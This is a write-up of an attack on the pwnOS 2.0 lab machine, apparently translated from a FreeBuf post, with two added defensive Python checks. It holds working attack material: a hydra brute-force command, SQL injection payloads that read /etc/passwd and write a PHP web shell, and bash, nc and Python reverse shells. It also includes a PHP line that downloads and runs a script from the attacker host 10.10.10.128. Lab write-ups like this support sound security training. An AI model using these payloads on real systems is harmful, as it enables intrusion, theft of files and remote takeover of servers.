Notes on a Target-Machine Lab Exercise
2021-03-14 22:33:42 Author: www.freebuf.com

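Contents

Target machine address

Information gathering

WhatWeb: checking whether the site is a CMS

Visiting the page on port 80

IsIntS

Directory enumeration

PHP version information

Searching for exploits

Brute-forcing the web login page with hydra

Failed attempts

Brute-forced: killerbeesareflying

Error-based injection

Logging in to the blog with the account and password

Viewing the source

Reading files through the injection with load_file

The into outfile function

Command execution

Reverse shell [1]

Reverse shell [2]

Privilege escalation

Direct login successful

(2) Viewing the blog source

MSF

Login successful

Uploading php-reverse-shell.php

Reverse shell

Checking the kernel version (web)

Database

Escalating to root

(3) sqlmap

Logging in

--os-shell: file upload link

Backdoor

Reverse shell

No luck: the shell does not connect back

sqlmap --file-write --file-dest did not succeed;

References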


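Target machine address

https://www.vulnhub.com/entry/pwnos-20-pre-release,34/

Host-only mode: 10.10.10.100

The attacking machine's IP must also be on the 10.10.10.0/24 subnet.

Modify the virtual network settings accordingly.

Information gathering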

<pre>PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 85:d3:2b:01:09:42:7b:20:4e:30:03:6d:d1:8f:95:ff (DSA)
|   2048 30:7a:31:9a:1b:b8:17:e7:15:df:89:92:0e:cd:58:28 (RSA)
|_  256 10:12:64:4b:7d:ff:6a:87:37:26:38:b1:44:9f:cf:5e (ECDSA)
80/tcp open  http    Apache httpd 2.2.17 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.2.17 (Ubuntu)
|_http-title: Welcome to this Site!
</pre>

WhatWeb: checking whether the site is a CMS

root@kali:~# whatweb 10.10.10.100
http://10.10.10.100 [200 OK] Apache[2.2.17], Cookies[PHPSESSID], Country[RESERVED][ZZ], Email[[email protected]], HTTPServer[Ubuntu Linux][Apache/2.2.17 (Ubuntu)], IP[10.10.10.100], PHP[5.3.5-1ubuntu7], Title[Welcome to this Site!], X-Powered-By[PHP/5.3.5-1ubuntu7]


<pre>root@kali:~# whatweb -v 10.10.10.100
WhatWeb report for http://10.10.10.100
Status    : 200 OK
Title     : Welcome to this Site!
IP        : 10.10.10.100
Country   : RESERVED, ZZ

Summary   : Email[[email protected]], PHP[5.3.5-1ubuntu7], Cookies[PHPSESSID], X-Powered-By[PHP/5.3.5-1ubuntu7], HTTPServer[Ubuntu Linux][Apache/2.2.17 (Ubuntu)], Apache[2.2.17]

Detected Plugins:
[ Apache ]
        The Apache HTTP Server Project is an effort to develop and
        maintain an open-source HTTP server for modern operating
        systems including UNIX and Windows NT. The goal of this
        project is to provide a secure, efficient and extensible
        server that provides HTTP services in sync with the current
        HTTP standards.

        Version      : 2.2.17 (from HTTP Server Header)
        Google Dorks: (3)
        Website     : http://httpd.apache.org/

[ Cookies ]
        Display the names of cookies in the HTTP headers. The
        values are not returned to save on space.

        String       : PHPSESSID

[ Email ]
        Extract email addresses. Find valid email address and
        syntactically invalid email addresses from mailto: link
        tags. We match syntactically invalid links containing
        mailto: to catch anti-spam email addresses, eg. bob at
        gmail.com. This uses the simplified email regular
        expression from
        http://www.regular-expressions.info/email.html for valid
        email address matching.

        String       : [email protected]

[ HTTPServer ]
        HTTP server header string. This plugin also attempts to
        identify the operating system from the server header.

        OS           : Ubuntu Linux
        String       : Apache/2.2.17 (Ubuntu) (from server string)

[ PHP ]
        PHP is a widely-used general-purpose scripting language
        that is especially suited for Web development and can be
        embedded into HTML. This plugin identifies PHP errors,
        modules and versions and extracts the local file path and
        username if present.

        Version      : 5.3.5-1ubuntu7
        Google Dorks: (2)
        Website     : http://www.php.net/

[ X-Powered-By ]
        X-Powered-By HTTP header

        String       : PHP/5.3.5-1ubuntu7 (from x-powered-by string)

HTTP Headers:
        HTTP/1.1 200 OK
        Date: Sun, 01 Nov 2020 12:03:58 GMT
        Server: Apache/2.2.17 (Ubuntu)
        X-Powered-By: PHP/5.3.5-1ubuntu7
        Set-Cookie: PHPSESSID=l0bmtqrfk7rh83bq157fbfm585; path=/
        Expires: Thu, 19 Nov 1981 08:52:00 GMT
        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
        Pragma: no-cache
        Vary: Accept-Encoding
        Content-Encoding: gzip
        Content-Length: 500
        Connection: close
        Content-Type: text/html
</pre>
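
The nmap and WhatWeb output above shows three things a defender can check in any response: a versioned Server header, an X-Powered-By header, and a session cookie set without HttpOnly. The following Python check is an added example, not part of the original write-up; the header text is abridged from the output above with a placeholder session value, and the function names and the hardened sample are assumptions.

```python
import re

# Abridged from the WhatWeb -v output above; the session value is a placeholder.
OBSERVED = """\
HTTP/1.1 200 OK
Server: Apache/2.2.17 (Ubuntu)
X-Powered-By: PHP/5.3.5-1ubuntu7
Set-Cookie: PHPSESSID=EXAMPLE; path=/
Content-Type: text/html
"""

# Constructed: the same response after hardening (assumed settings: Apache
# "ServerTokens Prod", php.ini "expose_php = Off", "session.cookie_httponly = 1").
HARDENED = """\
HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=EXAMPLE; path=/; HttpOnly
Content-Type: text/html
"""

def parse_headers(raw):
    """Return (lower-cased name, value) pairs, keeping repeated headers."""
    pairs = []
    for line in raw.splitlines()[1:]:  # skip the status line
        name, sep, value = line.partition(":")
        if sep:
            pairs.append((name.strip().lower(), value.strip()))
    return pairs

def audit_headers(raw):
    """Return (finding, evidence) tuples for disclosure and cookie issues."""
    findings = []
    for name, value in parse_headers(raw):
        if name == "server" and re.search(r"/\d", value):
            findings.append(("server-version-disclosed", value))
        elif name == "x-powered-by":
            findings.append(("x-powered-by-present", value))
        elif name == "set-cookie":
            cookie, *attrs = [part.strip() for part in value.split(";")]
            flags = {attr.split("=")[0].lower() for attr in attrs}
            if "httponly" not in flags:
                findings.append(("cookie-missing-httponly", cookie.split("=")[0]))
    return findings

if __name__ == "__main__":
    for label, raw in (("observed", OBSERVED), ("hardened", HARDENED)):
        print(label, audit_headers(raw))
```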

Visiting the page on port 80: IsIntS

Directory enumeration

---- Scanning URL: http://10.10.10.100/ ----
+ http://10.10.10.100/activate (CODE:302|SIZE:0)                                                                                             
==> DIRECTORY: http://10.10.10.100/blog/                                                                                                     
+ http://10.10.10.100/cgi-bin/ (CODE:403|SIZE:288)                                                                                           
==> DIRECTORY: http://10.10.10.100/includes/                                                                                                 
+ http://10.10.10.100/index (CODE:200|SIZE:854)                                                                                              
+ http://10.10.10.100/index.php (CODE:200|SIZE:854)                                                                                          
+ http://10.10.10.100/info (CODE:200|SIZE:50175)                                                                                             
+ http://10.10.10.100/info.php (CODE:200|SIZE:50044)                                                                                         
+ http://10.10.10.100/login (CODE:200|SIZE:1174)                                                                                             
+ http://10.10.10.100/register (CODE:200|SIZE:1562)                                                                                          
+ http://10.10.10.100/server-status (CODE:403|SIZE:293) 

PHP version information

http://10.10.10.100/info.php

PHP Version 5.3.5-1ubuntu7   Apache/2.2.17 (Ubuntu)      
Server Administrator : webmaster@localhost        
PATH :  /usr/local/bin:/usr/bin:/bin

Searching for exploits

Brute-forcing the web login page with hydra

root@kali:~# hydra -t 1 -l [email protected] -P /usr/share/wordlists/rockyou.txt  -vV -f 10.10.10.100 http-post-form "/:email=^USER^&&password=^PASS^&&submit="Login"&&submitted="TRUE":error"


Failed attempts

Brute-forced: killerbeesareflying

Error-based injection

Username:[email protected]' and updatexml(1,concat(0x3a,(0x0a,(select database()))))#

Password:x

Logging in to the blog with the account and password

Viewing the source

view-source:http://sourceforge.net/projects/sphpblog/


Looking at login.php again, it returns an error

Reading files through the injection with load_file

email=admi'union select 1,2,3,group_concat(load_file('/etc/passwd')),5,6,7,8#&pass=123456&submit=Login&submitted=TRUE

The into outfile function

email=admi'union select 1,2,3,'<?php system($_GET[\'cmd\'])',5,6,7,8 into outfile"/var/www/shell.php"#&pass=123456&submit=Login&submitted=TRUE
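
The login-form payloads above (updatexml, load_file, into outfile) leave recognizable markers in the POST body that a WAF rule or a review of logged request bodies can look for. The following Python detector is an added example, not part of the original write-up; the rule names, function name and sample bodies are assumptions, and every sample except the load_file request is constructed with placeholder content.

```python
import re
from urllib.parse import parse_qsl

# Markers for the statement shapes used in this write-up's login-form payloads.
RULES = {
    "union-select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "file-read": re.compile(r"\bload_file\s*\(", re.I),
    "file-write": re.compile(r"\binto\s+(?:out|dump)file\b", re.I),
    "error-based": re.compile(r"\b(?:updatexml|extractvalue)\s*\(", re.I),
}

def inspect_form_body(body):
    """Return {field: [rule names]} for every form field that trips a rule."""
    hits = {}
    # parse_qsl URL-decodes each value, so %27 and '+' encodings are covered.
    for field, value in parse_qsl(body, keep_blank_values=True):
        # Replace inline /* */ comments and whitespace runs with one space,
        # since both are used to split keywords apart.
        norm = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
        norm = re.sub(r"\s+", " ", norm)
        matched = [name for name, rx in RULES.items() if rx.search(norm)]
        if matched:
            hits[field] = matched
    return hits

# Sample request bodies. "file_read" is the load_file request from this page;
# the others are constructed and keep the page's shape with placeholders.
SAMPLES = {
    "file_read": "email=admi'union select 1,2,3,group_concat(load_file('/etc/passwd')),5,6,7,8#&pass=123456&submit=Login&submitted=TRUE",
    "file_write": "email=admi'union select 1,2,3,'PLACEHOLDER',5,6,7,8 into outfile\"/var/www/placeholder.php\"#&pass=123456&submit=Login&submitted=TRUE",
    "error_based": "email=user' and updatexml(1,concat(0x3a,(0x0a,(select database()))))#&pass=x&submit=Login&submitted=TRUE",
    "encoded": "email=a%27+UNION%2F**%2FSELECT+1%2C2%23&pass=x",
    "benign": "email=o%27brien%40example.test&pass=correct+horse&submit=Login&submitted=TRUE",
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, inspect_form_body(body))
```

Keyword matching only detects the attempt. The fix on the application side is a parameterized query for the login lookup, and on the database side an application account without the MySQL FILE privilege plus a restrictive secure_file_priv, which removes both load_file reads and into outfile writes.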

Command execution

Reverse shell [1]

bash: bash -i >& /dev/tcp/ip/port 0>&1

nc: nc -e /bin/sh ip port 

Reverse shell [2]

python: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ip",port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

The Python reverse shell was used.

Privilege escalation

Direct login successful

(2) Viewing the blog source

MSF

A new account and password were created

Login successful

Edit and image-upload options appear

Uploading php-reverse-shell.php

Reverse shell

$ python -c 'import pty;pty.spawn("/bin/bash")'

Checking the kernel version (web)

Database

Escalating to root

(3) sqlmap

Since the site has PHP pages, first check whether a universal-password login bypass works, then attempt SQL injection.

Capture the POST request

SQLMAP

Database information

Retrieving user information

killerbeesareflying

Logging in

--os-shell: file upload link

http://10.10.10.100/tmpudcop.php

Backdoor

http://10.10.10.100/tmpbdsvq.php

Reverse shell

10.10.10.100/php-reverse-shell.php

No luck: the shell does not connect back

Checking disable_functions in phpinfo shows that no functions are disabled

<?php system("cd /tmp; wget http://10.10.10.128/python.py; python python.py");?>

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.128",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

sqlmap --file-write --file-dest did not succeed.

References

https://www.cnblogs.com/zongdeiqianxing/p/13455187.html

https://www.jianshu.com/p/2e492632c191

https://blog.csdn.net/tq369/article/details/84964809?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromBaidu-2.control&depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromBaidu-2.control

https://blog.csdn.net/Lonelyhat/article/details/105840547

Source: https://www.freebuf.com/articles/web/266098.html